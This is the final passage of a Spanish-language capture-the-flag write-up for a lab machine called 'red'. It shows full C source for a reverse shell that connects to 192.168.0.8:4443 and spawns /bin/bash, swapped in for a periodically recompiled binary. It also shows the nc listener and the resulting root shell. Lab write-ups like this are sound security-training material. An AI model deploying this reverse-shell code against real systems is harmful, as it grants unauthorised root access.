
Debido a que esta compilado, podria intentar modificar su condenido y compilarlo con el mismo nombre para que me envie una shell, para ver como que usuario lo esta ejecutando.

Simplemente podemos utilizar la pagina → Online-Revershell, para crear nuestro payload.

#include <stdio.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <stdlib.h>
#include <unistd.h>
#include <netinet/in.h>
#include <arpa/inet.h>

int main(void){
    int port = 4443;
    struct sockaddr_in revsockaddr;

    int sockt = socket(AF_INET, SOCK_STREAM, 0);
    revsockaddr.sin_family = AF_INET;       
    revsockaddr.sin_port = htons(port);
    revsockaddr.sin_addr.s_addr = inet_addr("192.168.0.8");

    connect(sockt, (struct sockaddr *) &revsockaddr, 
    sizeof(revsockaddr));
    dup2(sockt, 0);
    dup2(sockt, 1);
    dup2(sockt, 2);

    char * const argv[] = {"/bin/bash", NULL};
    execvp("/bin/bash", argv);

    return 0;       
}

Luego esperamos la conexion con nc, y ejecutamos el rev nuevo. Que al parecer lo va compilando cada cierto tiempo.

nc -nlvp 443
Ncat: Version 7.93 ( https://nmap.org/ncat )
Ncat: Listening on :::4443
Ncat: Listening on 0.0.0.0:4443
Ncat: Connection from 192.168.0.14.
Ncat: Connection from 192.168.0.14:54452.
root@red:/var/www/wordpress/.git$ whoami
root
root@red:/var/www/wordpress/.git$

Conclusiones

La verdad una maquina bastante interesante, algo unico que veo esto de que cada tanto se cierre la shell entre otras cosas molestas que vas encontrando a medida que haces la maquina, pero vimos muchas tecnias y cosas interesantes.

Ya saben cualquier duda o consulta, pueden usar la seccion de comentarios o contactarme por disc #Varovish/varovish.

0
Subscribe to my newsletter

Read articles from Dh89 directly inside your inbox. Subscribe to the newsletter, and don't miss out.

Written by

Dh89
Dh89

Soy un entusiasta de la ciberseguridad,disc -> Varovish/varovish